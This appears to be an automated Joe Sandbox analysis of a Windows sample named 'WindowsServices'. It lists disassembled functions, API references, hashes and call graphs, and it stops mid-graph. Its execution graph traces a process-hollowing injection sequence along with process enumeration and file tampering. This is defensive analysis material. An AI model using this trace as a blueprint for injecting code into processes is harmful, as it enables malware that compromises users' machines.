                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1373 404360-4044a9 call 4048b0 call 40adf6 call 40adf0 call 40adea 1382 404552-40455e 1373->1382 1383 4044af-4044b1 1373->1383 1385 404560-404572 CreatePolygonRgn call 40ae02 1382->1385 1386 4045cb-4045d4 CreatePolygonRgn call 40ae02 1382->1386 1383->1382 1384 4044b7-4044bd 1383->1384 1384->1382 1388 4044c3-4044c7 1384->1388 1394 404574-404576 1385->1394 1395 404578 1385->1395 1390 4045d9-4045db 1386->1390 1391 4044cd-4044e3 1388->1391 1392 40454e 1388->1392 1396 4045e6-404667 call 40adcc * 4 1390->1396 1397 4045dd-4045e3 call 40add2 1390->1397 1398 4044e9-404548 _ftol * 2 1391->1398 1392->1382 1399 40457b-4045c9 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1394->1399 1395->1399 1397->1396 1398->1398 1401 40454a-40454c 1398->1401 1399->1390 1401->1392
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1413 403e10-403f48 call 4048b0 * 2 call 40adf6 call 40adf0 call 40adea 1424 403fd1-403fdd 1413->1424 1425 403f4e-403f50 1413->1425 1427 40404a-404053 CreatePolygonRgn call 40ae02 1424->1427 1428 403fdf-403ff1 CreatePolygonRgn call 40ae02 1424->1428 1425->1424 1426 403f52-403f56 1425->1426 1426->1424 1430 403f58-403f6e 1426->1430 1432 404058-40405a 1427->1432 1438 403ff3-403ff5 1428->1438 1439 403ff7 1428->1439 1433 403f74-403fcb _ftol * 2 1430->1433 1435 404065-4040e6 call 40adcc * 4 1432->1435 1436 40405c-404062 call 40add2 1432->1436 1433->1433 1437 403fcd-403fcf 1433->1437 1436->1435 1437->1424 1442 403ffa-404048 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1438->1442 1439->1442 1442->1432
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1466 40a940-40a999 GetWindowRect 1467 40aa54-40aa7e ClientToScreen call 40b08a 1466->1467 1468 40a99f-40a9a0 1466->1468 1470 40aa83-40aabc call 40adcc 1467->1470 1468->1470 1471 40a9a6-40a9a8 1468->1471 1472 40a9b2-40a9e6 call 4052c0 _ftol 1471->1472 1473 40a9aa-40a9ac 1471->1473 1472->1470 1478 40a9ec-40a9f1 1472->1478 1473->1470 1473->1472 1478->1470 1479 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1478->1479 1486 40aa4d call 40a440 1479->1486 1487 40aa52 1486->1487 1487->1470
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3564110013-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1160
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 2340 40a280 2353 405a10 2340->2353 2342 40a2a7 2343 405a10 104 API calls 2342->2343 2344 40a2b0 SendMessageA SendMessageA GetWindowRect 2343->2344 2480 4052c0 CopyRect 2344->2480 2346 40a30b _ftol 2347 40afbe 2346->2347 2348 40a342 GetWindowRect 2347->2348 2349 40a359 2348->2349 2481 405300 CopyRect 2349->2481 2352 40a38c 2552 40b0e0 2353->2552 2356 407516 LoadLibraryA 2358 407568 LoadLibraryA 2356->2358 2360 407652 LoadLibraryA 2358->2360 2361 40766b LoadLibraryA 2360->2361 2362 407681 LoadLibraryA 2361->2362 2363 407694 LoadLibraryA 2362->2363 2364 4076a4 LoadLibraryA 2363->2364 2365 4076ba LoadLibraryA 2364->2365 2366 4076ca LoadLibraryA 2365->2366 2367 4076da LoadLibraryA 2366->2367 2368 4076ea LoadLibraryA 2367->2368 2370 4077b1 LoadLibraryA 2368->2370 2371 4077c1 LoadLibraryA 2370->2371 2372 4077d1 LoadLibraryA 2371->2372 2373 4077e7 LoadLibraryA 2372->2373 2374 4077fd LoadLibraryA 2373->2374 2375 407813 LoadLibraryA 2374->2375 2376 407829 LoadLibraryA 2375->2376 2377 40783f LoadLibraryA 2376->2377 2378 40784f LoadLibraryA 2377->2378 2379 407865 LoadLibraryA 2378->2379 2380 40787b LoadLibraryA 2379->2380 2382 407a48 2380->2382 2383 407ad3 GetModuleFileNameW 2382->2383 2385 408afd 2382->2385 2393 408e4b 2382->2393 2384 407b09 wcscpy 2383->2384 2404 407b25 wcscpy wcscat wcscpy wcscat wcscat 2383->2404 2384->2404 2387 408c26 CreateFileW 2385->2387 2388 408cf7 2385->2388 2435 408b16 2385->2435 2387->2393 2396 408c78 CreateFileW 2387->2396 2390 408d00 CreateToolhelp32Snapshot 2388->2390 2399 408e47 2388->2399 2392 408d9c Process32First 2390->2392 2390->2393 2391 408158 CreateProcessW 2395 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 2391->2395 2441 408225 2391->2441 2405 408de6 Process32Next 2392->2405 2406 408e2d FindCloseChangeNotification 2392->2406 2393->2342 2398 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 2395->2398 2396->2393 2397 408c99 CreateFileW 2396->2397 2397->2393 2400 408cbc CreateFileW 2397->2400 2398->2441 2399->2393 2407 408f3a CreateFileA 2399->2407 2400->2393 2403 408cdd FindCloseChangeNotification 2400->2403 2402 408272 VirtualAllocEx 2402->2441 2411 408ce7 2403->2411 2404->2391 2405->2406 2408 408df7 strstr 2405->2408 2406->2342 2407->2393 2410 408fc7 CreateFileA 2407->2410 2412 408e3a 2408->2412 2413 408e0b strstr 2408->2413 2409 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 2409->2441 2410->2393 2415 408fe9 CreateFileW 2410->2415 2411->2342 2412->2342 2413->2412 2416 408e1f 2413->2416 2414 4082b6 VirtualAllocEx 2414->2441 2424 40903b wcslen CreateFileW 2415->2424 2416->2406 2416->2408 2417 408327 WriteProcessMemory 2417->2417 2417->2441 2418 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 2421 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 2418->2421 2418->2441 2420 40838c WriteProcessMemory 2420->2418 2420->2420 2421->2441 2422 4084c1 wcscpy wcscat MoveFileExW CopyFileW 2425 4087f8 ResumeThread 2422->2425 2422->2441 2423 4089af ResumeThread 2423->2441 2426 409077 wcscat CreateFileW 2424->2426 2425->2441 2431 409111 2426->2431 2432 40911a VirtualAlloc 2426->2432 2427 408a4d wcscat 2430 408a77 wcsstr 2427->2430 2429 408813 Sleep CreateToolhelp32Snapshot Module32First 2429->2441 2433 408a8f CreateFileW 2430->2433 2430->2441 2431->2432 2436 409148 ReadFile 2432->2436 2433->2441 2434 408900 Wow64SuspendThread 2434->2441 2435->2342 2445 40915c FindCloseChangeNotification 2436->2445 2437 4088c8 strstr 2437->2441 2442 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 2437->2442 2438 408945 ResumeThread Sleep DeleteFileW 2440 408977 Wow64SuspendThread 2438->2440 2438->2441 2439 408ad8 TerminateProcess 2439->2441 2444 408988 Sleep MoveFileExW 2440->2444 2441->2385 2441->2391 2441->2402 2441->2409 2441->2414 2441->2417 2441->2418 2441->2420 2441->2422 2441->2423 2441->2425 2441->2427 2441->2429 2441->2434 2441->2437 2441->2438 2441->2439 2441->2444 2442->2441 2444->2423 2444->2441 2447 4091c3 VirtualAlloc 2445->2447 2449 4092a3 2447->2449 2448 409b8a 2450 405a10 ExitProcess 2448->2450 2449->2448 2451 409409 2449->2451 2454 405a10 ExitProcess 2449->2454 2452 409bd6 2450->2452 2455 409428 2451->2455 2460 405a10 ExitProcess 2451->2460 2453 409be6 2452->2453 2456 405a10 ExitProcess 2452->2456 2457 409c07 2453->2457 2458 409c1e 2453->2458 2459 4093fd 2454->2459 2466 405a10 ExitProcess 2455->2466 2478 40949e 2455->2478 2456->2453 2461 405a10 ExitProcess 2457->2461 2463 409c27 2458->2463 2464 409c3e 2458->2464 2459->2451 2462 409404 2459->2462 2465 40941c 2460->2465 2470 409c12 2461->2470 2554 405a00 ExitProcess 2462->2554 2472 405a10 ExitProcess 2463->2472 2468 405a10 ExitProcess 2464->2468 2465->2455 2467 409423 2465->2467 2469 40945b 2466->2469 2555 405a00 ExitProcess 2467->2555 2468->2393 2476 405a10 ExitProcess 2469->2476 2469->2478 2470->2342 2473 409c32 2472->2473 2473->2342 2475 409a05 2475->2448 2477 405a10 ExitProcess 2475->2477 2476->2478 2477->2448 2478->2475 2479 40996b CreateProcessA Sleep TerminateProcess 2478->2479 2479->2475 2480->2346 2556 403e10 2481->2556 2483 405331 CopyRect 2484 403e10 7 API calls 2483->2484 2485 405351 CopyRect 2484->2485 2486 403e10 7 API calls 2485->2486 2487 405371 CopyRect 2486->2487 2488 403e10 7 API calls 2487->2488 2489 405391 CopyRect 2488->2489 2490 403e10 7 API calls 2489->2490 2491 4053b1 CopyRect 2490->2491 2492 403e10 7 API calls 2491->2492 2493 4053d1 CopyRect 2492->2493 2494 403e10 7 API calls 2493->2494 2495 4053f1 CopyRect 2494->2495 2496 403e10 7 API calls 2495->2496 2497 405411 CopyRect 2496->2497 2498 403e10 7 API calls 2497->2498 2499 405431 CopyRect 2498->2499 2500 403e10 7 API calls 2499->2500 2501 405451 CopyRect 2500->2501 2502 403e10 7 API calls 2501->2502 2503 405471 CopyRect 2502->2503 2504 403e10 7 API calls 2503->2504 2505 405491 CopyRect 2504->2505 2506 403e10 7 API calls 2505->2506 2507 4054b1 CopyRect 2506->2507 2508 403e10 7 API calls 2507->2508 2509 4054d1 CopyRect 2508->2509 2510 403e10 7 API calls 2509->2510 2511 4054f1 CopyRect 2510->2511 2512 403e10 7 API calls 2511->2512 2513 405511 CopyRect 2512->2513 2514 403e10 7 API calls 2513->2514 2515 405531 CopyRect 2514->2515 2516 403e10 7 API calls 2515->2516 2517 405551 CopyRect 2516->2517 2518 403e10 7 API calls 2517->2518 2519 405571 CopyRect 2518->2519 2520 403e10 7 API calls 2519->2520 2521 405591 CopyRect 2520->2521 2522 403e10 7 API calls 2521->2522 2523 4055b1 CopyRect 2522->2523 2524 403e10 7 API calls 2523->2524 2525 4055d1 CopyRect 2524->2525 2526 403e10 7 API calls 2525->2526 2527 4055f1 CopyRect 2526->2527 2528 403e10 7 API calls 2527->2528 2529 405611 CopyRect 2528->2529 2530 403e10 7 API calls 2529->2530 2531 405631 CopyRect 2530->2531 2532 403e10 7 API calls 2531->2532 2533 405651 CopyRect 2532->2533 2534 403e10 7 API calls 2533->2534 2535 405671 CopyRect 2534->2535 2536 403e10 7 API calls 2535->2536 2537 405691 CopyRect 2536->2537 2538 403e10 7 API calls 2537->2538 2539 4056b1 CopyRect 2538->2539 2540 403e10 7 API calls 2539->2540 2541 4056d1 CopyRect 2540->2541 2542 403e10 7 API calls 2541->2542 2543 4056f1 CopyRect 2542->2543 2544 403e10 7 API calls 2543->2544 2545 405711 CopyRect 2544->2545 2546 403e10 7 API calls 2545->2546 2547 405731 CopyRect 2546->2547 2548 403e10 7 API calls 2547->2548 2549 405751 CopyRect 2548->2549 2550 403e10 7 API calls 2549->2550 2551 405771 SetWindowRgn 2550->2551 2551->2352 2553 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2552->2553 2553->2356 2560 403e3a 2556->2560 2557 403fcd 2558 40404a CreatePolygonRgn 2557->2558 2559 403fdf CreatePolygonRgn 2557->2559 2566 404058 2558->2566 2561 403fef 2559->2561 2560->2557 2562 403f74 _ftol _ftol 2560->2562 2563 403ffa CombineRgn CreatePolygonRgn 2561->2563 2562->2557 2562->2562 2564 40ae02 2563->2564 2565 40401e CombineRgn 2564->2565 2565->2566 2566->2483 2956 40aac0 GetClientRect 2960 404ec0 CopyRect 2956->2960 2958 40ab29 LoadCursorA SetCursor 2959 40aae6 2959->2958 3039 403c20 2960->3039 2962 404ef1 2963 404f06 CopyRect 2962->2963 2964 404ef8 2962->2964 2965 403c20 4 API calls 2963->2965 2964->2959 2966 404f23 2965->2966 2967 404f38 CopyRect 2966->2967 2968 404f2a 2966->2968 2969 403c20 4 API calls 2967->2969 2968->2959 2970 404f55 2969->2970 2971 404f6a CopyRect 2970->2971 2972 404f5c 2970->2972 2973 403c20 4 API calls 2971->2973 2972->2959 2974 404f87 2973->2974 2975 404f9c CopyRect 2974->2975 2976 404f8e 2974->2976 2977 403c20 4 API calls 2975->2977 2976->2959 2978 404fb9 2977->2978 2979 404fc0 2978->2979 2980 404fce CopyRect 2978->2980 2979->2959 2981 403c20 4 API calls 2980->2981 2982 404feb 2981->2982 2983 405000 CopyRect 2982->2983 2984 404ff2 2982->2984 2985 403c20 4 API calls 2983->2985 2984->2959 2986 40501d 2985->2986 2987 405032 CopyRect 2986->2987 2988 405024 2986->2988 2989 403c20 4 API calls 2987->2989 2988->2959 2990 40504f 2989->2990 2991 405064 CopyRect 2990->2991 2992 405056 2990->2992 2993 403c20 4 API calls 2991->2993 2992->2959 2994 405081 2993->2994 2995 405096 CopyRect 2994->2995 2996 405088 2994->2996 2997 403c20 4 API calls 2995->2997 2996->2959 2998 4050b3 2997->2998 2999 4050c8 CopyRect 2998->2999 3000 4050ba 2998->3000 3001 403c20 4 API calls 2999->3001 3000->2959 3002 4050e5 3001->3002 3003 4050fa CopyRect 3002->3003 3004 4050ec 3002->3004 3005 403c20 4 API calls 3003->3005 3004->2959 3006 405117 3005->3006 3007 40512c CopyRect 3006->3007 3008 40511e 3006->3008 3009 403c20 4 API calls 3007->3009 3008->2959 3010 405149 3009->3010 3011 405150 3010->3011 3012 40515e CopyRect 3010->3012 3011->2959 3013 403c20 4 API calls 3012->3013 3014 40517b 3013->3014 3015 405190 CopyRect 3014->3015 3016 405182 3014->3016 3017 403c20 4 API calls 3015->3017 3016->2959 3018 4051ad 3017->3018 3019 4051c2 CopyRect 3018->3019 3020 4051b4 3018->3020 3021 403c20 4 API calls 3019->3021 3020->2959 3022 4051df 3021->3022 3023 4051f4 CopyRect 3022->3023 3024 4051e6 3022->3024 3025 403c20 4 API calls 3023->3025 3024->2959 3026 405211 3025->3026 3027 405226 CopyRect 3026->3027 3028 405218 3026->3028 3029 403c20 4 API calls 3027->3029 3028->2959 3030 405243 3029->3030 3031 405258 CopyRect 3030->3031 3032 40524a 3030->3032 3033 403c20 4 API calls 3031->3033 3032->2959 3034 405275 3033->3034 3035 40528a CopyRect 3034->3035 3036 40527c 3034->3036 3037 403c20 4 API calls 3035->3037 3036->2959 3038 4052a7 3037->3038 3038->2959 3042 403d04 3039->3042 3040 403d94 CreatePolygonRgn 3041 403dad 3040->3041 3043 403db1 PtInRegion 3041->3043 3046 403dca 3041->3046 3042->3040 3044 403d37 _ftol _ftol 3042->3044 3043->3046 3044->3044 3045 403d90 3044->3045 3045->3040 3046->2962 3055 40ac80 ExtTextOutA 3056 409c80 3065 401000 CopyRect 3056->3065 3058 409cf3 _ftol _ftol _ftol 3059 40afbe 3058->3059 3060 409d7d GetWindowRect 3059->3060 3061 409d98 3060->3061 3066 402500 CopyRect 3061->3066 3064 409dd5 3065->3058 3067 403e10 7 API calls 3066->3067 3068 402531 CopyRect 3067->3068 3397 404850 3068->3397 3070 402551 CopyRect 3071 403e10 7 API calls 3070->3071 3072 402571 CopyRect 3071->3072 3398 404850 3072->3398 3074 402591 CopyRect 3075 403e10 7 API calls 3074->3075 3076 4025b1 CopyRect 3075->3076 3399 404850 3076->3399 3078 4025d1 CopyRect 3079 403e10 7 API calls 3078->3079 3080 4025f1 CopyRect 3079->3080 3400 404850 3080->3400 3082 402611 CopyRect 3083 403e10 7 API calls 3082->3083 3084 402631 CopyRect 3083->3084 3401 404850 3084->3401 3086 402651 CopyRect 3087 403e10 7 API calls 3086->3087 3088 402671 CopyRect 3087->3088 3402 404850 3088->3402 3090 402691 CopyRect 3091 403e10 7 API calls 3090->3091 3092 4026b1 CopyRect 3091->3092 3403 404850 3092->3403 3094 4026d1 CopyRect 3095 403e10 7 API calls 3094->3095 3096 4026f1 CopyRect 3095->3096 3404 404850 3096->3404 3098 402711 CopyRect 3099 403e10 7 API calls 3098->3099 3100 402731 CopyRect 3099->3100 3405 404850 3100->3405 3102 402751 CopyRect 3103 403e10 7 API calls 3102->3103 3104 402771 CopyRect 3103->3104 3406 404850 3104->3406 3106 402791 CopyRect 3107 403e10 7 API calls 3106->3107 3108 4027b1 CopyRect 3107->3108 3407 404850 3108->3407 3110 4027d1 CopyRect 3111 403e10 7 API calls 3110->3111 3112 4027f1 CopyRect 3111->3112 3408 404850 3112->3408 3114 402811 CopyRect 3115 403e10 7 API calls 3114->3115 3116 402831 CopyRect 3115->3116 3409 404850 3116->3409 3118 402851 CopyRect 3119 403e10 7 API calls 3118->3119 3120 402871 CopyRect 3119->3120 3410 404850 3120->3410 3122 402891 CopyRect 3123 403e10 7 API calls 3122->3123 3124 4028b1 CopyRect 3123->3124 3411 404850 3124->3411 3126 4028d1 CopyRect 3127 403e10 7 API calls 3126->3127 3128 